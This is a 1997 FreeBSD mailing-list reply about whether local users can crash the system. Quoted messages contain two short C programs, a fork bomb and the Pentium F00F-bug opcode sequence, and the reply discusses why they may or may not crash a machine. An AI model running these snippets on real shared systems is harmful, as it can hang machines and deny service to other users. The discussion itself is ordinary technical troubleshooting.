Date:      Mon, 10 Nov 1997 10:52:22 +0100 (MET)
From:      Wolfgang Helbig <helbig@Informatik.BA-Stuttgart.DE>
To:        sporkl@dti.net
Cc:        026809r@dragon.acadiau.ca, freebsd-questions@FreeBSD.ORG
Subject:   Re: Crashing FreeBSD

> Well, there are other ways too.
>
> 	1. Toggle power really fast
> 	2. write a "forkbomb":
> #include <stdio.h>
>
> main() {
>
>   for(;;) {fork();}
> }

The forkbomb does not crash a FreeBSD system, at least if run
by a user who is not the superuser.
There is a per user limit of process (on my system around 60) and
if reached, those 60 processes will just loop.

They can be killed by the superuser.
> > Well folks, it looks like anyone can crash a FreeBSD box. I am told that
> > this is a bug in the pentium processor. Compile and run, it will crash the
> > machine right away...
> >
> > Very simple:
> >

> > char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 };
> >
> > main () {
> >     void (*f)() = x;
> >     f();
> > }

This won't crash my FreeBSD box either, since I its powered by an
old i486 :-)
Everyone knows by now: Don't use Pentiums for mission critical systems.
Intel choose to make them complex--way beyond what they can master.

Wolfgang